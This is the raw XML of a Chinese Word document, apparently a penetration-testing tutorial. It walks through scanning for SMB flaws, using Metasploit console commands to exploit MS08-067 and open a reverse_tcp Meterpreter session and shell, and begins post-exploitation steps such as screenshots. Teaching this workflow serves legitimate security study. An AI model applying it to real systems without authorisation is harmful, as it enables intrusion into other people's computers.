            <wp:effectExtent l="0" t="0" r="2540" b="1905"/>
            <wp:docPr id="31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1960245"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                    <a:effectLst/>
                    <a:extLst/>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w:rsidR="004056D3" w:rsidRPr="003E3E5A" w:rsidRDefault="004056D3" w:rsidP="004056D3">
      <w:pPr>
        <w:ind w:firstLineChars="200" w:firstLine="480"/>
      </w:pPr>
      <w:r w:rsidRPr="003E3E5A">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>借助smap的漏洞扫描脚本扫描smb漏洞：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="004056D3" w:rsidRPr="003E3E5A" w:rsidRDefault="004056D3" w:rsidP="004056D3">
      <w:pPr>
        <w:ind w:firstLineChars="200" w:firstLine="480"/>
      </w:pPr>
      <w:r w:rsidRPr="003E3E5A">
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="24683A0C" wp14:editId="4D87AF35">
            <wp:extent cx="5274310" cy="3654425"/>
            <wp:effectExtent l="0" t="0" r="2540" b="3175"/>
            <wp:docPr id="3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a:effectLst/>
                    <a:extLst/>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w:rsidR="004056D3" w:rsidRPr="003E3E5A" w:rsidRDefault="004056D3" w:rsidP="004056D3">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>3、</w:t>
      </w:r>
      <w:r w:rsidRPr="003E3E5A">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>渗透攻击</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="004056D3" w:rsidRPr="003E3E5A" w:rsidRDefault="004056D3" w:rsidP="004056D3">
      <w:pPr>
        <w:ind w:firstLineChars="200" w:firstLine="480"/>
      </w:pPr>
      <w:r w:rsidRPr="003E3E5A">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>经历了前面的几个阶段，我们对目标系统版本、运行的软件服务和存在的漏洞有了比较清晰的把握，下面就可以在msfconsole发起攻击了。依次用到的几个命令有：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="004056D3" w:rsidRPr="003E3E5A" w:rsidRDefault="004056D3" w:rsidP="004056D3">
      <w:r w:rsidRPr="003E3E5A">
        <w:t>show exploits</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="004056D3" w:rsidRPr="003E3E5A" w:rsidRDefault="004056D3" w:rsidP="004056D3">
      <w:pPr>
        <w:ind w:firstLineChars="200" w:firstLine="480"/>
      </w:pPr>
      <w:r w:rsidRPr="003E3E5A">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>显示Metasploit框架中所有可用的渗透攻击模块，一般需要针对前面扫描发现的安全漏洞来实施相应的渗透攻击。这个列表会随着更新越来越多。确定攻击模块后使用use命令来加载，加载成功后终端提示符会变化：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="004056D3" w:rsidRPr="003E3E5A" w:rsidRDefault="004056D3" w:rsidP="004056D3">
      <w:pPr>
        <w:ind w:firstLineChars="200" w:firstLine="480"/>
      </w:pPr>
      <w:r w:rsidRPr="003E3E5A">
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="69595DB7" wp14:editId="246D310A">
            <wp:extent cx="4638095" cy="761905"/>
            <wp:effectExtent l="0" t="0" r="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8095" cy="761905"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w:rsidR="004056D3" w:rsidRPr="003E3E5A" w:rsidRDefault="004056D3" w:rsidP="004056D3">
      <w:r w:rsidRPr="003E3E5A">
        <w:t>show auxiliary</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="004056D3" w:rsidRPr="003E3E5A" w:rsidRDefault="004056D3" w:rsidP="004056D3">
      <w:pPr>
        <w:ind w:firstLineChars="200" w:firstLine="480"/>
      </w:pPr>
      <w:r w:rsidRPr="003E3E5A">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>显示所有的辅助模块以及它们的用途，辅助模块用途广泛，可以是扫描器、拒绝服务攻击工具、fuzz测试器或其他类型的工具。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="004056D3" w:rsidRPr="003E3E5A" w:rsidRDefault="004056D3" w:rsidP="004056D3">
      <w:r w:rsidRPr="003E3E5A">
        <w:t>show payloads</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="004056D3" w:rsidRPr="003E3E5A" w:rsidRDefault="004056D3" w:rsidP="004056D3">
      <w:pPr>
        <w:ind w:firstLineChars="200" w:firstLine="480"/>
      </w:pPr>
      <w:r w:rsidRPr="003E3E5A">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>use选中模块后，在当前模块的命令提示符下输入show</w:t>
      </w:r>
      <w:r w:rsidRPr="003E3E5A">
        <w:t xml:space="preserve"> payloads</w:t>
      </w:r>
      <w:r w:rsidRPr="003E3E5A">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>会将与当前模块兼容的攻击载荷显示出来。在针对基于windows操作系统的攻击中，简单的攻击载荷可能只会返回目标主机的一个命令行页面，复杂的能够返回一个完整的图形操作界面。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="004056D3" w:rsidRPr="003E3E5A" w:rsidRDefault="004056D3" w:rsidP="004056D3">
      <w:pPr>
        <w:ind w:firstLineChars="200" w:firstLine="480"/>
      </w:pPr>
      <w:r w:rsidRPr="003E3E5A">
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="0BFF1445" wp14:editId="53B9410E">
            <wp:extent cx="5274310" cy="3309620"/>
            <wp:effectExtent l="0" t="0" r="2540" b="5080"/>
            <wp:docPr id="29696" name="图片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09620"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w:rsidR="004056D3" w:rsidRPr="003E3E5A" w:rsidRDefault="004056D3" w:rsidP="004056D3">
      <w:pPr>
        <w:ind w:firstLineChars="200" w:firstLine="480"/>
      </w:pPr>
      <w:r w:rsidRPr="003E3E5A">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>确定攻击载荷后可以用set命令来选中：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="004056D3" w:rsidRPr="003E3E5A" w:rsidRDefault="004056D3" w:rsidP="004056D3">
      <w:pPr>
        <w:ind w:firstLineChars="200" w:firstLine="480"/>
      </w:pPr>
      <w:r w:rsidRPr="003E3E5A">
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="05019373" wp14:editId="288262B1">
            <wp:extent cx="5274310" cy="457200"/>
            <wp:effectExtent l="0" t="0" r="2540" b="0"/>
            <wp:docPr id="29697" name="图片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457200"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w:rsidR="004056D3" w:rsidRPr="003E3E5A" w:rsidRDefault="004056D3" w:rsidP="004056D3">
      <w:r w:rsidRPr="003E3E5A">
        <w:t>show options</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="004056D3" w:rsidRPr="003E3E5A" w:rsidRDefault="004056D3" w:rsidP="004056D3">
      <w:pPr>
        <w:ind w:firstLineChars="200" w:firstLine="480"/>
      </w:pPr>
      <w:r w:rsidRPr="003E3E5A">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Options参数是保证Metasploit框架中各个模块正常运行所需的各种设置，当你选择了一个模块，并输入msf&gt;sho</w:t>
      </w:r>
      <w:r w:rsidRPr="003E3E5A">
        <w:t>w options</w:t>
      </w:r>
      <w:r w:rsidRPr="003E3E5A">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>后，会列出这个模块所需的各种参数。此外，攻击载荷可能也需要参数，选中payloads后show options能看到一些额外的参数。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="004056D3" w:rsidRPr="003E3E5A" w:rsidRDefault="004056D3" w:rsidP="004056D3">
      <w:pPr>
        <w:ind w:firstLineChars="200" w:firstLine="480"/>
      </w:pPr>
      <w:r w:rsidRPr="003E3E5A">
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="2D10F7D2" wp14:editId="7EFFECC1">
            <wp:extent cx="5274310" cy="2844800"/>
            <wp:effectExtent l="0" t="0" r="2540" b="0"/>
            <wp:docPr id="29698" name="图片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844800"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w:rsidR="004056D3" w:rsidRPr="003E3E5A" w:rsidRDefault="004056D3" w:rsidP="004056D3">
      <w:r w:rsidRPr="003E3E5A">
        <w:t>show targets</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="004056D3" w:rsidRPr="003E3E5A" w:rsidRDefault="004056D3" w:rsidP="004056D3">
      <w:pPr>
        <w:ind w:firstLineChars="200" w:firstLine="480"/>
      </w:pPr>
      <w:r w:rsidRPr="003E3E5A">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>显示受漏洞影响的目标系统的类型，如下显示了受ms08-067漏洞影响的部分操作系统版本，Auto</w:t>
      </w:r>
      <w:r w:rsidRPr="003E3E5A">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="003E3E5A">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Targeting通过攻击模块提取目标系统的指纹信息来自动选择操作系统进行攻击，但一般最好还是通过人工指定来避免出错。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="004056D3" w:rsidRPr="003E3E5A" w:rsidRDefault="004056D3" w:rsidP="004056D3">
      <w:pPr>
        <w:ind w:firstLineChars="200" w:firstLine="480"/>
      </w:pPr>
      <w:r w:rsidRPr="003E3E5A">
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="3B2AB488" wp14:editId="705C882A">
            <wp:extent cx="4447619" cy="3819048"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="29699" name="图片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447619" cy="3819048"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w:rsidR="004056D3" w:rsidRPr="003E3E5A" w:rsidRDefault="004056D3" w:rsidP="004056D3">
      <w:r w:rsidRPr="003E3E5A">
        <w:t>search</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="004056D3" w:rsidRPr="003E3E5A" w:rsidRDefault="004056D3" w:rsidP="004056D3">
      <w:pPr>
        <w:ind w:firstLineChars="200" w:firstLine="480"/>
      </w:pPr>
      <w:r w:rsidRPr="003E3E5A">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>search命令用来查找某个特定的渗透攻击、辅助或攻击载荷模块，比如查找与MS</w:t>
      </w:r>
      <w:r w:rsidRPr="003E3E5A">
        <w:t>08-067</w:t>
      </w:r>
      <w:r w:rsidRPr="003E3E5A">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>漏洞相关的模块：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="004056D3" w:rsidRPr="003E3E5A" w:rsidRDefault="004056D3" w:rsidP="004056D3">
      <w:pPr>
        <w:ind w:firstLineChars="200" w:firstLine="480"/>
      </w:pPr>
      <w:r w:rsidRPr="003E3E5A">
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="28E0AD65" wp14:editId="4E68B22A">
            <wp:extent cx="5274310" cy="1326515"/>
            <wp:effectExtent l="0" t="0" r="2540" b="6985"/>
            <wp:docPr id="29700" name="图片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326515"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w:rsidR="004056D3" w:rsidRPr="003E3E5A" w:rsidRDefault="004056D3" w:rsidP="004056D3">
      <w:r w:rsidRPr="003E3E5A">
        <w:t>info</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="004056D3" w:rsidRPr="003E3E5A" w:rsidRDefault="004056D3" w:rsidP="004056D3">
      <w:pPr>
        <w:ind w:firstLineChars="200" w:firstLine="480"/>
      </w:pPr>
      <w:r w:rsidRPr="003E3E5A">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>info+模块名可以显示模块的详细信息、参数说明和所有可用的目标操作系统，如果已经选择了某个模块，直接在该模块的提示符下输入info即可：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="004056D3" w:rsidRPr="003E3E5A" w:rsidRDefault="004056D3" w:rsidP="004056D3">
      <w:pPr>
        <w:ind w:firstLineChars="200" w:firstLine="480"/>
      </w:pPr>
      <w:r w:rsidRPr="003E3E5A">
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="2187D11F" wp14:editId="726E6042">
            <wp:extent cx="3800000" cy="476190"/>
            <wp:effectExtent l="0" t="0" r="0" b="635"/>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800000" cy="476190"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w:rsidR="004056D3" w:rsidRPr="003E3E5A" w:rsidRDefault="004056D3" w:rsidP="004056D3">
      <w:r w:rsidRPr="003E3E5A">
        <w:t>set/unset</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="004056D3" w:rsidRPr="003E3E5A" w:rsidRDefault="004056D3" w:rsidP="004056D3">
      <w:pPr>
        <w:ind w:firstLineChars="200" w:firstLine="480"/>
      </w:pPr>
      <w:r w:rsidRPr="003E3E5A">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>set可以对Metasploit模块中的某个参数进行设置并启用，unset可以禁用相关参数。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="004056D3" w:rsidRPr="003E3E5A" w:rsidRDefault="004056D3" w:rsidP="004056D3">
      <w:r w:rsidRPr="003E3E5A">
        <w:t>exploit</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="004056D3" w:rsidRPr="003E3E5A" w:rsidRDefault="004056D3" w:rsidP="004056D3">
      <w:pPr>
        <w:ind w:firstLineChars="200" w:firstLine="480"/>
      </w:pPr>
      <w:r w:rsidRPr="003E3E5A">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>当相关设置完成后，exploit命令用来初始化攻击环境并开始对目标进行攻击尝试。攻击成功后，会根据选择的payloads来返回不同的内容，比如说返回一个reverse_tcp方式的Meterpreter攻击载荷会话。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="004056D3" w:rsidRPr="003E3E5A" w:rsidRDefault="004056D3" w:rsidP="004056D3">
      <w:pPr>
        <w:ind w:firstLineChars="200" w:firstLine="480"/>
      </w:pPr>
      <w:r w:rsidRPr="003E3E5A">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>下图展示了一个典型的渗透攻击流程中msf的使用：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="004056D3" w:rsidRPr="003E3E5A" w:rsidRDefault="004056D3" w:rsidP="004056D3">
      <w:r w:rsidRPr="003E3E5A">
        <w:rPr>
          <mc:AlternateContent>
            <mc:Choice Requires="w16se">
              <w:rFonts w:hint="eastAsia"/>
            </mc:Choice>
            <mc:Fallback>
              <w:rFonts w:cs="宋体" w:hint="eastAsia"/>
            </mc:Fallback>
          </mc:AlternateContent>
        </w:rPr>
        <mc:AlternateContent>
          <mc:Choice Requires="w16se">
            <w16se:symEx w16se:font="宋体" w16se:char="2460"/>
          </mc:Choice>
          <mc:Fallback>
            <w:t>①</w:t>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
      <w:r w:rsidRPr="003E3E5A">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="003E3E5A">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>扫描服务和漏洞，确定操作系统类型并发现MS</w:t>
      </w:r>
      <w:r w:rsidRPr="003E3E5A">
        <w:t>08-067: VULNERABLE</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="004056D3" w:rsidRPr="003E3E5A" w:rsidRDefault="004056D3" w:rsidP="004056D3">
      <w:pPr>
        <w:ind w:firstLineChars="200" w:firstLine="480"/>
      </w:pPr>
      <w:r w:rsidRPr="003E3E5A">
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="0F6FC78E" wp14:editId="4E474490">
            <wp:extent cx="5274310" cy="2443480"/>
            <wp:effectExtent l="0" t="0" r="2540" b="0"/>
            <wp:docPr id="29702" name="图片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443480"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w:rsidR="004056D3" w:rsidRPr="003E3E5A" w:rsidRDefault="004056D3" w:rsidP="004056D3">
      <w:pPr>
        <w:ind w:firstLineChars="200" w:firstLine="480"/>
      </w:pPr>
      <w:r w:rsidRPr="003E3E5A">
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="1F1E2813" wp14:editId="62F4199F">
            <wp:extent cx="5274310" cy="3718560"/>
            <wp:effectExtent l="0" t="0" r="2540" b="0"/>
            <wp:docPr id="29703" name="图片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718560"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w:rsidR="004056D3" w:rsidRPr="003E3E5A" w:rsidRDefault="004056D3" w:rsidP="004056D3">
      <w:r w:rsidRPr="003E3E5A">
        <w:rPr>
          <mc:AlternateContent>
            <mc:Choice Requires="w16se">
              <w:rFonts w:hint="eastAsia"/>
            </mc:Choice>
            <mc:Fallback>
              <w:rFonts w:cs="宋体" w:hint="eastAsia"/>
            </mc:Fallback>
          </mc:AlternateContent>
        </w:rPr>
        <mc:AlternateContent>
          <mc:Choice Requires="w16se">
            <w16se:symEx w16se:font="宋体" w16se:char="2461"/>
          </mc:Choice>
          <mc:Fallback>
            <w:t>②</w:t>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
      <w:r w:rsidRPr="003E3E5A">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="003E3E5A">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>选择攻击模块和攻击载荷并设置参数</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="004056D3" w:rsidRPr="003E3E5A" w:rsidRDefault="004056D3" w:rsidP="004056D3">
      <w:pPr>
        <w:ind w:firstLineChars="200" w:firstLine="480"/>
      </w:pPr>
      <w:r w:rsidRPr="003E3E5A">
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="4987D5DB" wp14:editId="7B241E61">
            <wp:extent cx="5274310" cy="6628765"/>
            <wp:effectExtent l="0" t="0" r="2540" b="635"/>
            <wp:docPr id="29704" name="图片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6628765"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w:rsidR="004056D3" w:rsidRPr="003E3E5A" w:rsidRDefault="004056D3" w:rsidP="004056D3">
      <w:pPr>
        <w:ind w:firstLineChars="200" w:firstLine="480"/>
      </w:pPr>
      <w:r w:rsidRPr="003E3E5A">
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="33AE57B0" wp14:editId="4266DCDE">
            <wp:extent cx="5274310" cy="3613150"/>
            <wp:effectExtent l="0" t="0" r="2540" b="6350"/>
            <wp:docPr id="29705" name="图片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613150"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w:rsidR="004056D3" w:rsidRPr="003E3E5A" w:rsidRDefault="004056D3" w:rsidP="004056D3">
      <w:r w:rsidRPr="003E3E5A">
        <w:rPr>
          <mc:AlternateContent>
            <mc:Choice Requires="w16se">
              <w:rFonts w:hint="eastAsia"/>
            </mc:Choice>
            <mc:Fallback>
              <w:rFonts w:cs="宋体" w:hint="eastAsia"/>
            </mc:Fallback>
          </mc:AlternateContent>
        </w:rPr>
        <mc:AlternateContent>
          <mc:Choice Requires="w16se">
            <w16se:symEx w16se:font="宋体" w16se:char="2462"/>
          </mc:Choice>
          <mc:Fallback>
            <w:t>③</w:t>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
      <w:r w:rsidRPr="003E3E5A">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="003E3E5A">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>执行攻击</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="004056D3" w:rsidRPr="003E3E5A" w:rsidRDefault="004056D3" w:rsidP="004056D3">
      <w:pPr>
        <w:ind w:firstLineChars="200" w:firstLine="480"/>
      </w:pPr>
      <w:r w:rsidRPr="003E3E5A">
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="7F3419FE" wp14:editId="0CD63451">
            <wp:extent cx="5274310" cy="3698240"/>
            <wp:effectExtent l="0" t="0" r="2540" b="0"/>
            <wp:docPr id="29706" name="图片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698240"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w:rsidR="004056D3" w:rsidRPr="003E3E5A" w:rsidRDefault="004056D3" w:rsidP="004056D3">
      <w:pPr>
        <w:ind w:firstLineChars="200" w:firstLine="480"/>
      </w:pPr>
      <w:r w:rsidRPr="003E3E5A">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>攻击成功后提示Meterperter</w:t>
      </w:r>
      <w:r w:rsidRPr="003E3E5A">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="003E3E5A">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>session</w:t>
      </w:r>
      <w:r w:rsidRPr="003E3E5A">
        <w:t xml:space="preserve"> 1 </w:t>
      </w:r>
      <w:r w:rsidRPr="003E3E5A">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>opened，sessions</w:t>
      </w:r>
      <w:r w:rsidRPr="003E3E5A">
        <w:t xml:space="preserve"> –</w:t>
      </w:r>
      <w:r w:rsidRPr="003E3E5A">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>l可以查看Meterperter会话的详细信息，sessions</w:t>
      </w:r>
      <w:r w:rsidRPr="003E3E5A">
        <w:t xml:space="preserve"> –I 1</w:t>
      </w:r>
      <w:r w:rsidRPr="003E3E5A">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>命令让我们能够与id为1的控制会话进行交互，这时我们进入了Meterpreter的交互shell中，如果控制会话是一个反向连接命令行shell，这个命令会直接把我们带到命令提示符状态下，最后我们输入shell进入目标系统的交互命令行shell中，到此主机已经被我们攻陷了。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="004056D3" w:rsidRPr="003E3E5A" w:rsidRDefault="004056D3" w:rsidP="004056D3">
      <w:r w:rsidRPr="003E3E5A">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>后渗透攻击</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="004056D3" w:rsidRPr="003E3E5A" w:rsidRDefault="004056D3" w:rsidP="004056D3">
      <w:pPr>
        <w:ind w:firstLineChars="200" w:firstLine="480"/>
      </w:pPr>
      <w:r w:rsidRPr="003E3E5A">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>后渗透攻击阶段的利器</w:t>
      </w:r>
      <w:r w:rsidRPr="003E3E5A">
        <w:t>—</w:t>
      </w:r>
      <w:r w:rsidRPr="003E3E5A">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Meterpreter。</w:t>
      </w:r>
      <w:r w:rsidRPr="003E3E5A">
        <w:t>Meterpreter是Metasploit框架的一个扩展模块，通常作为溢出的攻击载荷使用，在触发漏洞后能返回一个控制通道（Meterpreter Shell连接）</w:t>
      </w:r>
      <w:r w:rsidRPr="003E3E5A">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>，</w:t>
      </w:r>
      <w:r w:rsidRPr="003E3E5A">
        <w:t>可以调用Metasploit</w:t>
      </w:r>
      <w:r w:rsidRPr="003E3E5A">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>的一些功能，对目标系统进行更为深入的渗透，包括跳板攻击、特权提升、反追踪、密码哈希值获取等等。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="004056D3" w:rsidRPr="003E3E5A" w:rsidRDefault="004056D3" w:rsidP="004056D3">
      <w:pPr>
        <w:ind w:firstLineChars="200" w:firstLine="480"/>
      </w:pPr>
      <w:r w:rsidRPr="003E3E5A">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Meterpreter基本命令：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="004056D3" w:rsidRPr="003E3E5A" w:rsidRDefault="004056D3" w:rsidP="004056D3">
      <w:pPr>
        <w:ind w:firstLineChars="200" w:firstLine="480"/>
      </w:pPr>
      <w:r w:rsidRPr="003E3E5A">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>成功入侵系统并获得系统的Meterpreter会话后，可以利用一些基本的Meterpreter命令来收集更多的信息，比如有：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="004056D3" w:rsidRPr="003E3E5A" w:rsidRDefault="004056D3" w:rsidP="004056D3">
      <w:pPr>
        <w:ind w:firstLineChars="200" w:firstLine="480"/>
      </w:pPr>
      <w:r w:rsidRPr="003E3E5A">
        <w:t>S</w:t>
      </w:r>
      <w:r w:rsidRPr="003E3E5A">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>creenshot：获取活动用户的的桌面截屏</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="004056D3" w:rsidRPr="003E3E5A" w:rsidRDefault="004056D3" w:rsidP="004056D3">
      <w:pPr>
        <w:ind w:firstLineChars="200" w:firstLine="480"/>
      </w:pPr>
      <w:r w:rsidRPr="003E3E5A">
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="10A1B177" wp14:editId="2621D1E3">
            <wp:extent cx="4285714" cy="419048"/>
            <wp:effectExtent l="0" t="0" r="635" b="635"/>
            <wp:docPr id="29707" name="图片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85714" cy="419048"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
